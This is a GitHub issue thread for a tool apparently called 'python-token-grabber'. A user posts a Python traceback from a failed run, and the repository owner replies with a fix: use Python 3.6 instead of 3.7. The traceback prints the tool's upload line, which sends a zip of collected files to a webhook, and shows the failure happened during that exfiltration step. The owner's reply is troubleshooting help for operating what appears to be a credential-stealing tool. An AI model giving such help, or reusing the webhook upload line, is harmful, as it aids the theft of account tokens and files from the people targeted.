### ISSUE TITLE
error

### ISSUE THREAD

**Issue by tommy1235** [blakeando/python-token-grabber#1]
`

Traceback (most recent call last):                                                 File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\connectionpool.py", line 600, in urlopen                                     chunked=chunked)                                                               File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\connectionpool.py", line 384, in _make_request                               six.raise_from(e, None)                                                        File "", line 2, in raise_from                                           File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\connectionpool.py", line 380, in _make_request                               httplib_response = conn.getresponse()                                          File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\http\client.py ", line 1321, in getresponse                                                         response.begin()                                                               File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\http\client.py ", line 296, in begin                                                                version, status, reason = self._read_status()                                  File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\http\client.py ", line 257, in _read_status                                                         line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")                       File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\socket.py", li ne 589, in readinto                                                                  return self._sock.recv_into(b)                                               ConnectionResetError: [WinError 10054] An existing connection was forcibly close d by the remote host                                                                                                                                              During handling of the above exception, another exception occurred:                                                                                               Traceback (most recent call last):                                                 File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ requests\adapters.py", line 449, in send                                             timeout=timeout                                                                File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\connectionpool.py", line 638, in urlopen                                     _stacktrace=sys.exc_info()[2])                                                 File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\util\retry.py", line 367, in increment                                       raise six.reraise(type(error), error, _stacktrace)                             File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\packages\six.py", line 685, in reraise                                       raise value.with_traceback(tb)                                                 File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\connectionpool.py", line 600, in urlopen                                     chunked=chunked)                                                               File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\connectionpool.py", line 384, in _make_request                               six.raise_from(e, None)                                                        File "", line 2, in raise_from                                           File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ urllib3\connectionpool.py", line 380, in _make_request                               httplib_response = conn.getresponse()                                          File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\http\client.py ", line 1321, in getresponse                                                         response.begin()                                                               File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\http\client.py ", line 296, in begin                                                                version, status, reason = self._read_status()                                  File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\http\client.py ", line 257, in _read_status                                                         line = str(self.fp.readline(_MAXLINE + 1), "iso-8859-1")                       File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\socket.py", li ne 589, in readinto                                                                  return self._sock.recv_into(b)                                               urllib3.exceptions.ProtocolError: ('Connection aborted.', ConnectionResetError(1 0054, 'An existing connection was forcibly closed by the remote host', None, 100 54, None))                                                                                                                                                        During handling of the above exception, another exception occurred:                                                                                               Traceback (most recent call last):                                                 File "Token Grabber.py", line 76, in                                       main()                                                                         File "Token Grabber.py", line 57, in main                                          hook.send('Zip File:', file = File('./'+zipf, name=zipf)) # Remember whateve r location this is installed @ it will attempt to save files here and upload.      File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ dhooks\client.py", line 276, in send                                                 return self._request('POST', payload, file=file)                               File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ dhooks\client.py", line 357, in _request                                             headers=headers, files=multipart)                                              File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ requests\sessions.py", line 581, in post                                             return self.request('POST', url, data=data, json=json, **kwargs)               File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ requests\sessions.py", line 533, in request                                          resp = self.send(prep, **send_kwargs)                                          File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ requests\sessions.py", line 646, in send                                             r = adapter.send(request, **kwargs)                                            File "C:\Users\Tom W\AppData\Local\Programs\Python\Python37\lib\site-packages\ requests\adapters.py", line 498, in send                                             raise ConnectionError(err, request=request)                                  requests.exceptions.ConnectionError: ('Connection aborted.', ConnectionResetErro r(10054, 'An existing connection was forcibly closed by the remote host', None,  10054, None))
--

`

**Comment by blakeando** [comment]
you are using python 3.7, the program needs python 3.6
